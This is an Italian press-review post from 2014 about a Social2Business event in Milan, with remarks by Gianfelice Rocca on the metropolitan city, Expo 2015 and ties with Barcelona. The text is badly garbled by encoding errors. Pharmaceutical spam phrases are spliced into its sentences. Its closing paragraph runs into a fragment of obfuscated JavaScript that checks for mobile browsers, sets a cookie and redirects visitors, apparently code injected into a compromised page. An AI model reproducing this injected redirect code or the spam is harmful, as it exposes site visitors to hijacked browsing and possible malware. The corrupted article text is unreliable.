Settegiorni: Rocca: “La cittAi?? metropolitana A? il futuro anche dell’hinterland”

By s2b | 21 ottobre 2014 | Rassegna stampa

“Milano cittAi?? metropolitana”. E’ questo l’augurio di Gianfelice Rocca, presidente Assolombarda, presentando l’evento Social2Business, progetto di giovani imprenditori italiani e spagnoli che vuole rispondere alla crisi con nuovi modelli d’impresa, la cui presentazione A? prevista oggi, venerdAi?? 17, nella sede della Regione Lombardia.

Insieme a lui Emiliano Novelli, presidente Gruppo giovani imprenditori, il quale ha sottolineato l’importanza del networking: una vasta rete di aziende locali che condividono progetti e idee. “E’ da questo concetto di contaminazione tra idee innovative – ha detto Rocca – che il lavoro si sta trasformando sempre piA? in lavoro di team”.

La cittAi?? di Milano con la sua periferia sta assumendo un ruolo economico vitale che si canada meds no prescription. A? voluto paragonare alla cittAi?? di Barcellona, rappresentata nel progetto da Alex Cruz, presidente di Vueling, compagnia low-cost spagnola, tra le prime d’Europa e partner del progetto Social2Business. La vueling offrirAi?? ai 100 giovani imprenditori un volo di linea Milano-Barcellona, dove si confronteranno per nuove idee di business. Dei molti paralleli tra le due cittAi?? ha parlato Rocca, sottolineando come a Milano l’export delle industrie ha raggiunto un 25% del totale nazionale, grazie al fatto che nel raggio di 60 chilometri dal capoluogo lombardo sono attive realtAi?? imprenditoriali ben gestite.

Inoltre la posizione strategica dell’aeroporto di Malpensa e le prossime infrastrutture di Expo lysto sildenafil spray. 2015, secondo Cruz, possono dare un forte sviluppo alla fascia industriale che circonda Milano, aiutando il settore dei trasporti e della mobilitAi??, tema caro ai cittadini quanto alle industrie. Non a caso durante la conferenza si A? parlato anche di car e bike sharing, sistema innovativo di trasporto che sta avendo un forte riscontro del pubblico.

Alla domanda “La secessione puA? aiutare il mercato del lavoro?”. Rocca ha risposto puntando i riflettori sui territori diversi, dove puA? nascere una creativitAi?? territoriale che deve avere come punto d’arrivo Expo e quindi un respiro internazionale. “Milano centro del mondo” non solo uno slogan, ma quello che accadrAi?? nei prossimi mesi.

Il “metodo Zanardi”, ovvero pensare in positivo alle cose che abbiamo piuttosto che fissarci su ciA? che ci manca, A? il modello proposto da Rocca, che ha sottolineato l’importanza di valorizzare ciA? che giAi?? abbiamo e farlo funzionare per il meglio. La cittAi?? metropolitana A? il futuro di Milano e del suo hinterlando, Rhodense, Bollatese, Magentino e Alto Milanese compresi. |m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tag:, , ,